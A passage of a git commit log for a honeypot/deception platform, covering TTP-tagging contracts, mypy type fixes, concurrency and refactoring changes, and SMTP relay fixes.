  tolerance contract is enforced in the base class, not on trust.
- KNOWN_SOURCE_KINDS: Final[frozenset[str]] enumerating every
  source_kind a producer is allowed to emit. Closed-by-enumeration
  at the runtime layer; the composite tagger keys its WARNING/INFO
  bridge off this constant to surface the silent-drop trap from
  the design doc (lines 160–195).
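The tolerance contract above can be sketched as follows. This is an illustration under assumptions, not the contents of decnet/ttp/base.py: the event is simplified to a plain dict instead of the TaggerEvent NamedTuple, and the logger name is made up.

```python
import asyncio
import logging
from abc import ABC, abstractmethod

log = logging.getLogger("ttp.sketch")  # hypothetical logger name


class Tagger(ABC):
    name: str = "base"
    HANDLES: frozenset = frozenset()  # empty default: a misconfigured subclass stays idle

    @abstractmethod
    async def tag(self, event: dict) -> list: ...


class TolerantTagger(Tagger):
    async def tag(self, event: dict) -> list:
        try:
            return await self._tag_impl(event)
        except Exception:
            # Exception, not BaseException: KeyboardInterrupt, SystemExit and
            # asyncio.CancelledError are not caught here and keep propagating.
            log.warning("tagger %s swallowed an error", self.name, exc_info=True)
            return []

    @abstractmethod
    async def _tag_impl(self, event: dict) -> list: ...
```

Subclasses implement `_tag_impl` only, so the try/except lives in one place and cannot be forgotten by a lifter author.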

E.1.4 — decnet/ttp/factory.py
- get_tagger() reads DECNET_TTP_TAGGER_TYPE (default 'composite');
  unknown values raise ValueError with the known-list. Mirrors
  decnet.intel.factory and decnet.clustering.factory.
- _KNOWN = ('composite',). Per-lifter classes (E.1.6) are children
  of the composite, not standalone tagger types.
- CompositeTagger(Tagger): pre-computes a dict[str, list[Tagger]]
  dispatch index from each lifter's HANDLES; fans events out
  concurrently with asyncio.gather and concatenates results.
  Empty lifters=[] is the legal contract-phase state — E.1.6
  wires the real lifters in.
- Unhandled-event observability: source_kind in KNOWN_SOURCE_KINDS
  but no lifter claims it -> WARNING once per kind per process
  (missed E.1.6 update). Unknown kind -> INFO once per kind per
  process (future-feature telemetry, by design). Per-process dedup
  via plain set; E.1.6 may swap in a proper rate-limiter once
  production traffic shapes are known.
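A rough sketch of the dispatch index and the once-per-kind logging described above. The `KNOWN_SOURCE_KINDS` values, the `tag(source_kind, payload)` signature, and the per-instance (rather than per-process) dedup set are simplifying assumptions for illustration.

```python
import asyncio
import logging
from collections import defaultdict

log = logging.getLogger("ttp.sketch")  # hypothetical logger name
KNOWN_SOURCE_KINDS = frozenset({"command", "email"})  # placeholder values


class CompositeTagger:
    def __init__(self, lifters):
        # Pre-compute source_kind -> lifters once, from each lifter's HANDLES.
        self._index = defaultdict(list)
        for lifter in lifters:
            for kind in lifter.HANDLES:
                self._index[kind].append(lifter)
        self._seen_unhandled = set()  # plain-set dedup, as in the commit message

    async def tag(self, source_kind, payload):
        lifters = self._index.get(source_kind, [])
        if not lifters:
            if source_kind not in self._seen_unhandled:
                self._seen_unhandled.add(source_kind)
                # Known but unclaimed is a wiring bug; unknown is future telemetry.
                known = source_kind in KNOWN_SOURCE_KINDS
                log.log(logging.WARNING if known else logging.INFO,
                        "no lifter claims source_kind=%s", source_kind)
            return []
        # Fan out concurrently; gather preserves the order of its arguments.
        chunks = await asyncio.gather(*(l.tag(source_kind, payload) for l in lifters))
        return [tag for chunk in chunks for tag in chunk]
```

An empty `lifters=[]` yields an empty index, so every event takes the logging branch and returns `[]`, which matches the contract-phase state described above.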

Tests — tests/ttp/test_base.py, tests/ttp/test_factory.py
- Tagger / TolerantTagger abstractness, missing-tag-impl rejection,
  WARNING-not-ERROR log level, propagation of KeyboardInterrupt /
  SystemExit / asyncio.CancelledError.
- Factory env-var routing, unknown-name ValueError, dispatch-index
  correctness, only-claiming-lifter invocation, WARNING-once for
  known-but-unclaimed kinds, INFO-once for unknown kinds, result
  concatenation across lifters.

Mypy clean under .311/bin/mypy --ignore-missing-imports.
2026-05-01 06:20:10 -04:00
e395306dcb feat(ttp): E.1.2 bus topic contract — TTP_TAGGED, TTP_RULE_FIRED, TTP_RULE_SUPPRESSED, EMAIL_RECEIVED
Second TTP-tagging contract commit. Constants only — no publishers,
no subscribers, no tests. (E.2.3 ships the bus-topic naming tests.)

- New roots: EMAIL, TTP.
- New leaves: EMAIL_RECEIVED ('received', single-token under EMAIL),
  TTP_TAGGED ('tagged'), TTP_RULE_FIRED ('rule.fired'),
  TTP_RULE_SUPPRESSED ('rule.suppressed'). Per-rule reload + state
  topics ship with the RuleStore (E.1.11) — co-located with
  producer.
- New builders: email_topic(event_type), ttp(event_type),
  ttp_rule_fired(technique_id). The ttp_rule_fired builder validates
  technique_id as a single segment so sub-techniques like T1110.001
  are rejected at construction; topic key is the parent technique,
  sub_technique lives in the payload.
- email_topic is named with the _topic suffix to avoid shadowing the
  Python email stdlib at import sites that pull both.
- TTP_TAGGING.md E.1.2 entry corrected: the spec referenced
  'ATTACKER_ENRICHED' but the actual constant is
  ATTACKER_INTEL_ENRICHED ('intel.enriched'). The existing constant
  covers the design intent (TTP intel_lifter wakes on
  attacker.intel.enriched). No rename — would break every existing
  subscriber.
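A small sketch of the single-segment validation in the ttp_rule_fired builder. The full topic layout (`ttp.rule.fired.<technique_id>`) is an assumption; the commit message only gives the 'rule.fired' leaf and the rule that sub-techniques are rejected.

```python
TTP_ROOT = "ttp"                # assumed root token
TTP_RULE_FIRED = "rule.fired"   # leaf named in the commit message


def ttp_rule_fired(technique_id: str) -> str:
    """Build the per-technique topic; the key is the parent technique only."""
    if not technique_id or "." in technique_id:
        # T1110.001 would add a segment; the sub-technique belongs in the payload.
        raise ValueError(f"technique_id must be a single segment, got {technique_id!r}")
    return f"{TTP_ROOT}.{TTP_RULE_FIRED}.{technique_id}"
```

Rejecting the dot at construction keeps wildcard matching predictable: one extra segment always means one technique.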

Wiki update for the four new topics ships in a sibling commit in
wiki-checkout (separate repo per project layout).
2026-05-01 06:08:11 -04:00
ce7efdfdd2 feat(ttp): E.1.1 schema contract — TTPTag, TTPRule, TTPRuleState, evidence TypedDicts, compute_tag_uuid
First contract commit of TTP tagging. Shapes only — no behavior.

- TTPTag SQLModel: deterministic UUIDv5 PK; (source_kind, source_id)
  discriminated provenance; nullable attacker_uuid + identity_uuid
  with ON DELETE CASCADE; native sqlalchemy.JSON evidence column;
  required attack_release; CheckConstraint('attacker_uuid IS NOT
  NULL OR identity_uuid IS NOT NULL'); composite indexes for the
  primary query patterns (identity_uuid+technique_id,
  attacker_uuid+technique_id, technique_id+created_at); __init__
  guard raising ValueError with both anchor names in the message
  (belt-and-braces for MySQL <8.0.16 where CHECK is silent).
- compute_tag_uuid(): RFC-4122 UUIDv5 over the six tag-identity
  fields under a fixed _TTP_TAG_NS. Pure, deterministic, replay-safe.
- Per-source_kind evidence TypedDicts (CommandEvidence,
  IntelEvidence, EmailEvidence, CanaryFingerprintEvidence) — PII
  rule lives in the type: EmailEvidence has no field for raw rcpt
  addresses or body bytes.
- TTPRule + TTPRuleState tables for the DatabaseRuleStore (E.1.11).
- All symbols re-exported from decnet.web.db.models per the
  package's existing convention.
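A hedged sketch of a deterministic UUIDv5 tag id. The log does not list the six identity fields or the namespace value, so the parameter names, the placeholder namespace, and the separator below are all hypothetical.

```python
import uuid
from typing import Optional

# Placeholder namespace; the real _TTP_TAG_NS value is not shown in this log.
_TTP_TAG_NS = uuid.uuid5(uuid.NAMESPACE_DNS, "ttp-tag.example.invalid")
_SEP = "\x1f"  # unit separator keeps ("ab", "c") distinct from ("a", "bc")


def compute_tag_uuid(source_kind: str, source_id: str, rule_id: str,
                     rule_version: str, technique_id: str,
                     sub_technique_id: Optional[str]) -> uuid.UUID:
    """Pure function of its inputs: the same six fields always give the same UUID."""
    parts = (source_kind, source_id, rule_id, rule_version,
             technique_id, sub_technique_id or "")
    return uuid.uuid5(_TTP_TAG_NS, _SEP.join(parts))
```

Replaying the same event through the same rule reproduces the same primary key, so an insert-or-ignore write stays idempotent.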

Tests for invariants (CHECK behavior, evidence round-trip across
SQLite+MySQL, idempotency property, init-guard ordering) land in
E.2.1/E.2.2 with xfail-strict markers per Appendix E discipline.
2026-05-01 06:03:45 -04:00
d09764beec docs(ttp): add TTP tagging design (order-of-work step 1)
Pre-implementation spec for the TTP-tagging worker. Defines the
ATT&CK-canonical vocabulary, schema (ttp_tag + ttp_rule[_state]),
bus topics, worker shape, lifter layering (rule-based v0,
behavioral/intel/email v0.5, sigma/biometric later), confidence
model, API surface, UI surface, observability, performance targets,
and a CDD plan (Appendix E) that splits contracts from tests with
xfail discipline so CI stays green between steps.
2026-05-01 06:02:56 -04:00
9e003d3acd Merge branch 'merge-rehearsal' into dev
# Conflicts:
#	decnet/templates/postgres/server.py
#	decnet/templates/rdp/Dockerfile
#	decnet/templates/redis/Dockerfile
#	decnet/templates/smtp/Dockerfile
#	decnet/templates/smtp/entrypoint.sh
#	decnet/templates/snmp/Dockerfile
#	decnet/templates/snmp/entrypoint.sh
#	decnet/templates/tftp/Dockerfile
#	decnet/templates/tftp/entrypoint.sh
#	decnet/templates/vnc/Dockerfile
#	decnet/templates/vnc/entrypoint.sh
#	templates/rdp/Dockerfile
#	templates/smb/Dockerfile
#	templates/smtp/Dockerfile
#	templates/smtp/entrypoint.sh
#	templates/snmp/Dockerfile
#	templates/snmp/entrypoint.sh
#	templates/tftp/Dockerfile
#	templates/tftp/entrypoint.sh
#	templates/vnc/Dockerfile
#	tests/services/test_smtp_relay.py
2026-05-01 02:27:20 -04:00
776861a1b7 fix(types): T7 — eliminate all remaining 38 mypy errors; fix DeckyRow subscript in engine tests 2026-05-01 02:19:53 -04:00
bd50b0d8b2 fix(types): T6 — suppress scapy attr-defined on lazy imports in tcpfp.py 2026-05-01 02:19:00 -04:00
f6e67c036d fix(types): T5 — narrow AsyncClient|None with inline if; rename loop variable t→task to avoid no-redef 2026-05-01 02:18:57 -04:00
d187304e99 fix(types): T4 — stop spreading TopologySummary as dict; fix heartbeat .get() and scope param 2026-05-01 02:18:55 -04:00
0f90dcfd3e fix(types): T3 — narrow str|None at 12 sites; fix LANRow/DeckyRow subscript in mutator tests 2026-05-01 02:18:53 -04:00
65a2bdf0e7 fix(types): T2 — add missing method stubs to BaseRepository; fix get_logs/add_lan/edge/decky signatures 2026-05-01 02:18:45 -04:00
ed6263a53d fix(types): T1 — remove 15 stale type: ignore comments confirmed unused by mypy 2026-05-01 02:18:40 -04:00
ee24a7551f fix(types): T7 — eliminate all remaining 38 mypy errors; fix DeckyRow subscript in engine tests 2026-05-01 02:07:53 -04:00
7e4da95091 fix(types): T6 — suppress scapy attr-defined on lazy imports in tcpfp.py 2026-05-01 01:53:59 -04:00
b9684254f0 fix(types): T5 — narrow AsyncClient|None with inline if; rename loop variable t→task to avoid no-redef 2026-05-01 01:53:10 -04:00
e387acf79d fix(types): T4 — stop spreading TopologySummary as dict; fix heartbeat .get() and scope param 2026-05-01 01:51:43 -04:00
d637ff515e fix(types): T3 — narrow str|None at 12 sites; fix LANRow/DeckyRow subscript in mutator tests 2026-05-01 01:47:04 -04:00
502ac42518 fix(types): T2 — add missing method stubs to BaseRepository; fix get_logs/add_lan/edge/decky signatures 2026-05-01 01:28:50 -04:00
f597ab2810 fix(types): T1 — remove 15 stale type: ignore comments confirmed unused by mypy 2026-05-01 01:26:24 -04:00
19271f9319 fix(types): P3 — annotate transport in all template protocol servers; 0 errors in templates/
- asyncio.Protocol (TCP): _transport: asyncio.Transport | None = None + cast() in
  connection_made; assert guards in every method that directly accesses the field.
  Files: pop3, smtp, mqtt, postgres, mssql, mongodb, imap, ldap, redis, mysql, sip, vnc.
- asyncio.DatagramProtocol (UDP): _transport: asyncio.DatagramTransport | None = None.
  Files: snmp, tftp, SIPUDPProtocol.
- RDP: assert new_transport is not None after start_tls() to narrow Transport | None.
- FTP (Twisted): assert self.transport is not None + targeted type: ignore for imprecise
  Twisted stubs (misc/override/arg-type/attr-defined), IReactorTCP cast for listenTCP.
- conpot: proc.stdout is None guard before iteration.
- Bonus fixes surfaced by annotation:
  - smtp: get_payload(decode=True) bytes narrowing (arg-type on sha256)
  - postgres: rename shadowed `msg` param to `err_msg` in _handle_startup
  - mongodb: base64.binascii.Error → import binascii; binascii.Error
  - imap: result: list[int] = [] (var-annotated)
2026-05-01 01:09:14 -04:00
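The transport annotation pattern from P3, sketched on a toy echo protocol. `EchoProtocol` is a made-up example class, not one of the template servers.

```python
import asyncio
from typing import Optional, cast


class EchoProtocol(asyncio.Protocol):
    # Declared Optional so mypy knows the field is unset before connection_made.
    _transport: Optional[asyncio.Transport] = None

    def connection_made(self, transport: asyncio.BaseTransport) -> None:
        # The base signature hands over a BaseTransport; a TCP protocol
        # narrows it to Transport with cast().
        self._transport = cast(asyncio.Transport, transport)

    def data_received(self, data: bytes) -> None:
        # The assert narrows Optional[Transport] to Transport for mypy.
        assert self._transport is not None
        self._transport.write(data)
```

The assert doubles as a runtime guard: a method called before `connection_made` fails loudly instead of raising AttributeError on None.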
52b5074149 chore(types): P2 — mark sqlmodel_repo complete in STATIC-TYPES.md 2026-05-01 00:50:00 -04:00
614780f144 fix(types): P2 — wire _MixinBase + col() across sqlmodel_repo; suppress pydantic/SQLModel column typing false positives
- Add _MixinBase abstract class to _helpers.py: declares _session(),
  _deserialize_attacker(), _assert_pending(), _check_and_bump_version(),
  and list_running_topology_deckies() so mypy can see cross-mixin contracts
- Add _require(val, msg) helper for narrowing T | None → T
- Inherit _MixinBase in all 26 leaf mixin classes
- Wrap SQLAlchemy column method calls (.is_(), .like(), .notin_(), .in_(),
  .contains()) with col() from sqlmodel — fixes attr-defined false positives
  caused by pydantic plugin typing class-level fields as Python value types
- Wrap select(Model.field) with select(col(Model.field)) for column projections
- Add pyproject.toml [[tool.mypy.overrides]] to disable arg-type in
  sqlmodel_repo.*: pydantic plugin resolves .where(Model.field == v) as
  where(bool), a false positive; call-arg still catches real argument errors
- Remove 9 stale # type: ignore comments (logging, helpers, credentials)
- Fix telemetry.py traced() overload no-redef + misc
- Fix logs.py datetime/str operator and nullable PK comparison with col()
- sqlmodel_repo/ now has 0 mypy errors
2026-05-01 00:49:18 -04:00
d777a1c4e0 chore(types): P1 — mark all P1 items complete in STATIC-TYPES.md 2026-05-01 00:23:30 -04:00
9cf7bc5aab fix(types): P1 — remove 2 stale type: ignore[no-untyped-def] in clustering adapters 2026-05-01 00:22:33 -04:00
5a240a3d55 fix(types): P1 — widen _send_json data param to dict | list in elasticsearch server 2026-05-01 00:22:16 -04:00
05cdd72d51 fix(types): P1 — annotate ranges: list[Range] in geoip/rir and asn/iptoasn providers 2026-05-01 00:21:44 -04:00
6f8f2ed573 fix(types): P1 — type: ignore[abstract] for plugin-discovery cls() call in registry 2026-05-01 00:21:09 -04:00
23caa86266 fix(types): P1 — pydantic.mypy plugin, types-PyYAML stub, pin mypy<1.20 2026-05-01 00:20:54 -04:00
909913e912 fix(types): P0 mypy — explicit binascii import, drop dead or None in ntlmssp
syslog_bridge.py: base64.binascii is not a public mypy-visible attribute;
import binascii directly and reference binascii.Error at the except clause.
Propagated to all 26 template subdirectory copies (all were drift-free).

ntlmssp.py: `principal = username or None` widened the type to str | None
for no runtime reason — _decode_str() always returns str.  Drop the `or None`.
Propagated to smb/ and rdp/ copies.

762 → 722 mypy errors (-40).
2026-05-01 00:09:00 -04:00
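The binascii fix in miniature. `decode_b64_or_none` is a hypothetical helper; the point is the explicit `import binascii` and catching `binascii.Error` directly instead of reaching through `base64.binascii`.

```python
import base64
import binascii  # imported directly; base64.binascii is an implementation detail
from typing import Optional


def decode_b64_or_none(blob: str) -> Optional[bytes]:
    """Decode strict base64, returning None for malformed input."""
    try:
        return base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
```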
fc1f0914b7 refactor(topology): introduce TopologyRepository protocol with DTO return types
Replace repo: BaseRepository with a structural TopologyRepository protocol
in persistence.py and allocator.py. All read methods now return typed DTOs
(TopologySummary, LANRow, DeckyRow, EdgeRow) instead of raw dicts, eliminating
silent field-shape regressions across the topology subsystem.

TopologySummary gains email_personas and language_default so api_personas.py
can continue reading those fields via attribute access. hydrate() converts
DTOs to dicts before passing to _backfill_decky_configs, keeping the mutable
working-state function dict-based at its boundary. All production callers
(router handlers, mutator, CLI, heartbeat) migrated from dict/get access to
attribute access. 134 tests pass.
2026-04-30 23:51:41 -04:00
3456d3ab45 fix(models): Literal types on topology enum fields, hoist _MUTATION_OPS, top-level json import
MutationRow.op was str despite _MUTATION_OPS existing; Topology.mode/status,
TopologyDecky.state, TopologyMutation.op/state carried valid values only in
comments; deferred json import had no justification.

- Promote _MUTATION_OPS before table classes so table fields can reference it
- Add sa_column=Column(String) on each Literal-annotated table field to satisfy
  SQLModel 0.0.38 column-type inference
- Move import json to module top; remove deferred import inside _decode_json_payload
- MutationRow.op: str -> _MUTATION_OPS
2026-04-30 23:17:24 -04:00
3cb0203d07 fix(frontend): layout viewport selector, credentials tab order, Attackers.css shared import 2026-04-30 22:16:46 -04:00
eb34d0b1ea fix(event_kinds): remove probe_forwarded from INTERACTION_EVENT_TYPES 2026-04-30 22:16:11 -04:00
78d3e3a6b9 refactor(auth): hoist _CREDENTIALS_EXCEPTION constant, tighten JWT dependency chain 2026-04-30 22:16:06 -04:00
0b5228eb94 feat(config): add swarmctl-host to INI, env, CLI; drop hardcoded bind from systemd unit
[swarm] swarmctl-host → DECNET_SWARMCTL_HOST so operators set the bind
address once in decnet.ini; `decnet swarmctl` and the systemd unit both
resolve it via envvar — no --host/--port pinned on ExecStart.
2026-04-30 22:16:00 -04:00
57fecb8071 refactor(frontend): ApiError interface, tempIdSuffix rename, NET_GRID constants, extract onPaletteDrop handlers
ApiError: defined once in utils/api.ts, replaces 9 ad-hoc anonymous casts
across MazeNET, Inspector, DeckyFleet, SwarmHosts, Webhooks, PersonaGeneration,
ServiceConfigFields, CanaryTokens.

hex4 renamed to tempIdSuffix — the name now matches the comment that already
explained its purpose.

NET_GRID_{W,H,GAP,COLS} extracted from inline magic numbers to module-level
constants in MazeNET.tsx.

onPaletteDrop (130-line useCallback) split into three module-level handlers
(_dropNetwork, _dropArchetype, _dropService); the callback becomes a 10-line
router.
2026-04-30 22:14:20 -04:00
b754e9aa8b refactor(validate): move forwards_l3 overload explanation into check docstring
The 17-line block comment at _RULES was prose covering for a design wart.
The explanation belongs on the function itself — moved there and condensed.
_RULES now has a 2-line pointer instead of an essay.
2026-04-30 22:10:41 -04:00
402d6584ba fix(topology_store): use sqlite3.Row for named column access in current()
Row unpacking by positional index breaks silently on schema changes.
row_factory = sqlite3.Row gives named access with minimal overhead.
2026-04-30 22:09:51 -04:00
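A short illustration of named column access with sqlite3.Row. The table and column names are invented for the example and do not reflect the real topology_store schema.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row  # rows now support row["column"] lookups
conn.execute("CREATE TABLE topology (id TEXT, status TEXT)")  # hypothetical schema
conn.execute("INSERT INTO topology VALUES ('abc12345', 'active')")


def current(conn: sqlite3.Connection) -> dict:
    # Column order in the SELECT no longer matters to the caller.
    row = conn.execute("SELECT status, id FROM topology LIMIT 1").fetchone()
    return {"id": row["id"], "status": row["status"]}
```

With positional unpacking, reordering the SELECT list would silently swap the two values; with named access it does not.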
9ad62d8177 fix(compose): name the topology_id prefix length constant
topology_id[:8] appeared twice with no explanation. 8 chars mirrors the
git short-SHA style and is collision-safe within a single deployment's
network namespace.
2026-04-30 22:09:26 -04:00
eb7ccd0006 fix(reuse_worker): remove noqa: BLE001 (rule not in ruff select)
fix(generator): correct service pool count in _SVC_MIN/_SVC_MAX comment

BLE001 is not in ruff.toml select (F/ANN/RUF/E/W only); the suppressions
were whispering apologies to a linter that wasn't listening. Generator
comment now cites the actual ~28-entry non-singleton service pool.
2026-04-30 22:06:44 -04:00
17480093a9 refactor(topology_ops): decompose apply() into focused helpers
apply() was an 85-line function handling hash verification, validation,
superseding teardown, bridge/compose provisioning, and store persistence.
Extracted _check_hash_and_validate(), _teardown_superseded(), and _materialise()
so each step is independently readable and testable.
2026-04-30 21:56:48 -04:00
d1ed2701e7 refactor(generator): promote nested functions; rename used_combos to seen_service_pairs
_take_ip and _new_decky were closures capturing outer-scope state. Promoted to
module-level with explicit parameters. seen_service_pairs name makes the intent
clear — it prevents the same service frozenset from being assigned repeatedly.
2026-04-30 21:53:45 -04:00
07e6bafff8 fix(validate): narrow bare except to ImportError in psutil port-collision check
The original except Exception silently disabled port collision detection for
any runtime error — not just a missing package. Now only ImportError degrades
gracefully; real psutil failures propagate.
2026-04-30 21:53:05 -04:00
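A sketch of the narrowed guard, assuming the optional dependency is loaded by name. `load_optional` and `port_in_use` are hypothetical helpers; only a missing package degrades to None, while errors raised while using the module propagate.

```python
import importlib
from typing import Optional


def load_optional(module_name: str):
    """Return the module, or None only when it is not installed."""
    try:
        return importlib.import_module(module_name)
    except ImportError:  # ModuleNotFoundError is a subclass
        return None


def port_in_use(port: int, module_name: str = "psutil") -> Optional[bool]:
    mod = load_optional(module_name)
    if mod is None:
        return None  # check skipped: dependency absent
    # No try/except here on purpose: a real failure inside the library surfaces.
    return any(c.laddr and c.laddr.port == port
               for c in mod.net_connections(kind="inet"))
```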
84e0ac4a43 fix(topology): cache IPAllocator host set; type repo params as BaseRepository
_host_set is computed once in __init__ — reserve() and is_free() were rebuilding
the full host frozenset on every call. BaseRepository already existed; the Any
annotations were just never updated.
2026-04-30 21:52:29 -04:00
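A minimal sketch of caching the host set at construction. The class below is a simplified stand-in for the real IPAllocator; method bodies and the ValueError are assumptions.

```python
import ipaddress


class IPAllocator:
    def __init__(self, cidr: str) -> None:
        self._network = ipaddress.ip_network(cidr)
        # Built once here instead of on every reserve()/is_free() call.
        self._host_set = frozenset(self._network.hosts())
        self._reserved: set = set()

    def is_free(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return addr in self._host_set and addr not in self._reserved

    def reserve(self, ip: str) -> None:
        if not self.is_free(ip):
            raise ValueError(f"{ip} is not available")
        self._reserved.add(ipaddress.ip_address(ip))
```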
257857338c fix(api): replace threading.Lock with asyncio.Lock for hydration guard
await inside a threading.Lock yields to the event loop while the OS
thread still holds the lock — potential deadlock under FastAPI thread
pool dispatch. asyncio.Lock is the correct primitive for async
critical sections. Also fixed stale diurnal.py docstring that had the
delegation direction backwards.
2026-04-30 21:24:11 -04:00
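One way to write a run-once hydration guard with asyncio.Lock. The `Hydrator` class and its `load` callback are hypothetical; the real code uses a module-level flag and lock.

```python
import asyncio


class Hydrator:
    def __init__(self, load) -> None:
        self._load = load            # async callable that reads config from the DB
        self._lock = asyncio.Lock()  # cooperative lock: waiting yields to the loop
        self._hydrated = False

    async def ensure(self) -> None:
        if self._hydrated:           # fast path, no lock needed
            return
        async with self._lock:
            if self._hydrated:       # re-check: another task may have finished first
                return
            await self._load()
            self._hydrated = True
```

Awaiting inside `async with` is safe here because a task waiting on an asyncio.Lock suspends itself instead of blocking the thread that runs the event loop.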
3fce597a70 docs(bodies): document intentional shared _body_canary in dispatch table 2026-04-30 21:19:07 -04:00
2629a8a0de fix(fake): rename prompt to _prompt, drop noqa suppression 2026-04-30 21:18:55 -04:00
a8c69155ff fix(planner): surface dropped weight entries in PUT /realism/config response
_parse_weights was silently dropping content_class values that don't
belong on their target list with no operator feedback. Changed it to
return (weights, dropped), apply_payload to collect and return all
dropped names, and put_config to include dropped_entries in the
response when non-empty.
2026-04-30 21:18:41 -04:00
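A sketch of returning dropped entries alongside the parsed weights. Function names, the `allowed` parameter, and the response shape beyond the `dropped_entries` key are assumptions.

```python
def parse_weights(raw: dict, allowed: frozenset) -> tuple:
    """Split raw weights into (accepted, dropped_names) instead of dropping silently."""
    weights, dropped = {}, []
    for name, value in raw.items():
        if name in allowed:
            weights[name] = float(value)
        else:
            dropped.append(name)
    return weights, dropped


def build_response(weights: dict, dropped: list) -> dict:
    body = {"weights": weights}
    if dropped:  # key is present only when something was actually dropped
        body["dropped_entries"] = dropped
    return body
```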
8a40f6ced0 fix(personas_pool): re-stat after read to avoid caching stale mtime
The initial stat and read happened without a lock between them. A file
change mid-window stored the mtime of the pre-change stat against the
post-change content, suppressing the next reload. Re-stat after
read_text; fall back to the pre-read stat only on OSError.
2026-04-30 21:17:50 -04:00
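The re-stat ordering, sketched as a standalone helper. `read_with_mtime` is a hypothetical name; the real pool keeps the result in its cache.

```python
from pathlib import Path


def read_with_mtime(path: Path) -> tuple:
    """Return (text, mtime_ns), pairing the content with a stat taken after the read."""
    pre = path.stat()
    text = path.read_text()
    try:
        post = path.stat()  # a write between pre and the read shows up here
    except OSError:
        post = pre          # fall back to the pre-read stat only on error
    return text, post.st_mtime_ns
```

If the file changes after the second stat, the cached mtime is older than the file on disk, so the next check triggers a reload rather than suppressing one.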
1e1c92abc3 fix(bodies): type make_body_with_llm persona parameter via TYPE_CHECKING
The persona arg was typed Any to avoid a circular import. Added a
TYPE_CHECKING guard to import EmailPersona annotation-only so mypy
has the type without a runtime import cycle.
2026-04-30 21:17:26 -04:00
ebe15310ab fix(api): hydrate planner from DB exactly once on first GET, not on every read
get_config was calling planner.apply_payload on every GET request, racing
concurrent reads on module-level globals. Added a _hydrated flag + lock
so DB hydration runs at most once per process lifetime; put_config marks
it done too. Test fixture resets the flag between tests.
2026-04-30 21:17:03 -04:00
c7fcd86be4 fix(planner): guard apply_payload and reset_to_defaults with a lock
Concurrent PUT requests could observe a half-updated planner between
the four sequential global assignments. Added _planner_lock so the
rebind is atomic; same lock wraps reset_to_defaults.
2026-04-30 21:15:12 -04:00
f597d70430 fix(realism): use minute-precision datetime in in_active_hours
personas.in_active_hours was discarding the minute component of the
active-hours window, making "09:30-17:45" behave as "09:00-17:00".
Rewrote it to delegate to diurnal.in_work_hours (which uses full
minute arithmetic) and updated the scheduler caller to pass the full
datetime instead of now_dt.hour.
2026-04-30 21:14:36 -04:00
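A minimal sketch of a minute-precision window check. The signature, the half-open interval (end excluded), and the lack of overnight-window handling are assumptions, not the behavior of diurnal.in_work_hours.

```python
from datetime import datetime, time


def in_work_hours(now: datetime, window: str) -> bool:
    """True when now falls inside a same-day 'HH:MM-HH:MM' window."""
    start_s, end_s = window.split("-")
    start = time.fromisoformat(start_s)
    end = time.fromisoformat(end_s)
    current = now.time().replace(second=0, microsecond=0)
    # Compare full HH:MM values, not just the hour component.
    return start <= current < end
```

With "09:30-17:45", 09:15 is outside the window and 17:30 is inside; an hour-only comparison would have answered the opposite for both.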
f6422f2529 fix(heartbeat): replace remaining bare except Exception with SQLAlchemyError and typed builtins 2026-04-30 21:08:26 -04:00
542d129d6f refactor(services_live): replace string-sniffed error dispatch with typed exception subclasses
ServiceNotFoundError (→ 404) and ServiceConflictError (→ 409) replace the
"not found" / "already on" / "not on" substring checks in _map_mutation_error;
base ServiceMutationError still maps to 422. Fixes three pre-existing test
status-code assertions (201 vs 200 on POST endpoints).
2026-04-30 20:49:29 -04:00
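The typed dispatch can be sketched like this. The class names and status codes come from the commit message; the body of the mapping function is an assumption.

```python
class ServiceMutationError(Exception):
    """Base class: maps to 422."""


class ServiceNotFoundError(ServiceMutationError):
    """Maps to 404."""


class ServiceConflictError(ServiceMutationError):
    """Maps to 409."""


def map_mutation_error(exc: ServiceMutationError) -> int:
    # Subclasses are checked before the base so the most specific match wins.
    if isinstance(exc, ServiceNotFoundError):
        return 404
    if isinstance(exc, ServiceConflictError):
        return 409
    return 422
```

Rewording an error message can no longer change the HTTP status, which the substring checks could not guarantee.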
a5487eb55f refactor(enroll-bundle): extract bundle_builder and move DTOs to swarm models
Pure tarball construction (_build_tarball, _render_*, _iter_included,
_SYSTEMD_UNITS) moved to decnet/swarm/bundle_builder.py — no FastAPI
dependency, independently testable. EnrollBundleRequest/Response moved
to decnet/web/db/models/swarm.py alongside the other swarm DTOs.
Router drops from 504 to 260 lines; keeps only the in-memory token
registry, sweeper, and endpoints.
2026-04-30 20:39:42 -04:00
e124f9e296 refactor(swarm): extract _shard_payload helper and promote _dispatch to module-level 2026-04-30 20:25:38 -04:00
c648d8b04e fix(heartbeat): replace bare except Exception with specific types and intent comments 2026-04-30 20:19:52 -04:00
72498f81b2 fix(ui): surface attacker date_hdr in mail table and drawer
MailDrawer was reading fields.date / from_addr / message_id —
all wrong; actual log field names are date_hdr, from_hdr,
message_id_hdr, to_hdr.  The mail table in AttackerDetail
showed only DECNET capture time and used from_addr instead
of from_hdr.  Add a DATE (attacker) column so the attacker-
supplied Date header (including timezone) is visible at a
glance — useful for correlating campaigns like the Tiscali
run where IPs used distinct TZs (+0800 vs -0700).
2026-04-30 14:11:08 -04:00
d0b07bdf52 fix(smtp_relay): inject From: header if absent so attacker address shows in client
Relay-test scripts send minimal DATA with no headers. Without a From:
header the mail client falls back to displaying the envelope sender
(upstream_sender). Inject From: <attacker MAIL FROM> before forwarding
when the message has no existing From: header.
2026-04-30 12:43:41 -04:00
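A rough sketch of the header injection using the stdlib email package. `ensure_from_header` is a hypothetical helper and may differ from how the relay builds the forwarded message.

```python
from email import message_from_bytes


def ensure_from_header(raw: bytes, mail_from: str) -> bytes:
    """Add From: <MAIL FROM address> only when the message has no From: header."""
    msg = message_from_bytes(raw)
    if msg["From"] is not None:
        return raw  # already has a From: header, leave the bytes untouched
    msg["From"] = mail_from
    return msg.as_bytes()
```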
4d12fb6a03 fix(smtp_relay): upgrade to STARTTLS before AUTH if server advertises it
Servers like mail.resacachile.cl only expose AUTH after STARTTLS. Issue
starttls() + re-ehlo() when the server advertises the extension.
2026-04-30 12:40:17 -04:00
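The upgrade sequence, sketched against the smtplib.SMTP interface. `login_with_optional_starttls` is a hypothetical wrapper; `ehlo`, `has_extn`, `starttls`, and `login` are the standard smtplib methods.

```python
import smtplib


def login_with_optional_starttls(client: smtplib.SMTP, user: str, password: str) -> None:
    client.ehlo()
    if client.has_extn("starttls"):
        client.starttls()
        client.ehlo()  # re-EHLO: the server may advertise AUTH only after TLS
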